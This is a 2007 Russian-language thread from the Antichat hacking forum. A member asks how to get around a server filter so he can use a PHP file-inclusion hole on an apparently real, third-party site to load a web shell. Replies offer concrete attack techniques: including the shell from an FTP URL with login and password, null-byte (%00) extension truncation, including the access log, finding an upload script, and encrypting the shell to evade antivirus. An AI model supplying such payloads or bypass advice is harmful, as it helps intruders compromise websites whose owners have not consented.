Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
17.11.2007, 23:03
|
|
Познающий
Регистрация: 09.08.2005
Сообщений: 34
Провел на форуме:
74778
Репутация:
6
|
|
Помогите с PHP Inj
Вообщем есть сайт такого вида:
_http://www.site.com/site.php?page=index
после рандомного текста вводимого вместо index, выдает следующее:
Код:
Warning: main(ggsdf.php) [function.main]: failed to open stream: No such file or directory in /home/site/public_html/site.php on line 61
Warning: main(ggsdf.php) [function.main]: failed to open stream: No such file or directory in /home/site/public_html/site.php on line 61
Fatal error: main() [function.require]: Failed opening required 'ggsdf.php' (include_path='.:/usr/local/lib/php') in /home/site/public_html/site.php on line 61
Но после подстановки шелла в адресной строке, выдает следующее:
Service Temporarily Unavailable
The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.
Как это можно обойти? |
|
|
17.11.2007, 23:05
|
|
Познавший АНТИЧАТ
Регистрация: 02.06.2006
Сообщений: 1,188
Провел на форуме:
6023777
Репутация:
2642
|
|
Сообщение от CraF
Как это можно обойти?
Попробуй указать вместо http://host/shell ссылку с фтп, т.е. - ftp://login:pass@host/shell
Кстате если укажешь site вместо index, то возможно будет рекурсия =)
|
|
|
|
17.11.2007, 23:10
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076
Репутация:
4303
|
|
имхо будет то же самое что и при http
Просто такая фигня появляется из-за url file access
ТС, пробуй отбросить разширение с помощью нулл-байта и ищи скрипт для аплода файлов
Или пробуй инклудить ацес_лог - что не очень действенно =\
|
|
|
|
17.11.2007, 23:18
|
|
Познающий
Регистрация: 09.08.2005
Сообщений: 34
Провел на форуме:
74778
Репутация:
6
|
|
Да, аналогичная ситуация что и с http =\
%00 также не помогло =\
|
|
|
|
17.11.2007, 23:30
|
|
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
Провел на форуме:
2693408
Репутация:
861
|
|
Spyder, если там url file access, то %00 там никак не поможет  |
|
|
|
17.11.2007, 23:33
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734
Репутация:
1917
|
|
Сообщение от n0ne
Spyder, если там url file access, то %00 там никак не поможет Это ты ошибаешься, Spyder все правильно сказал, он говорил про локальный инклюд, а не ты не CraF непоняли про что он говорил
__________________
Карфаген должен быть разрушен...
|
|
|
|
17.11.2007, 23:34
|
|
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
Провел на форуме:
2693408
Репутация:
861
|
|
А да, извиняюсь, думал про %00 было сказано в тему про ремоут..ну да ладно)
|
|
|
|
17.11.2007, 23:57
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076
Репутация:
4303
|
|
Посмотрел, при добовление нулл байта такая же фигня происходит
имхо ничего не сделаеш
Если конечно сможешь залить как нибудь пшп файл, что вообще нереально =)
|
|
|
|
18.11.2007, 00:05
|
|
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
Провел на форуме:
2693408
Репутация:
861
|
|
Странно, что при вписывании набора букв он выдает нормальную ошибку, а как инклюдишь шелл, то он пишет бред...у меня такое ощущение, что у них просто Iis там, антивирь или что-то подобное ловит шелл и просто не пускает его. ТС, попробуй проинклудить что-нить другое, или закрипти шелл.
|
|
|
|
18.11.2007, 00:12
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076
Репутация:
4303
|
|
гг, ИИС на никс сервере =)
Дело не в шелле. а в символах которые ты вводишь в строку
Попробуй перейти по ссылке site.php?%00 будет такая же фигня
Там просто фильтры стоят
Последний раз редактировалось Spyder; 18.11.2007 в 00:15..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
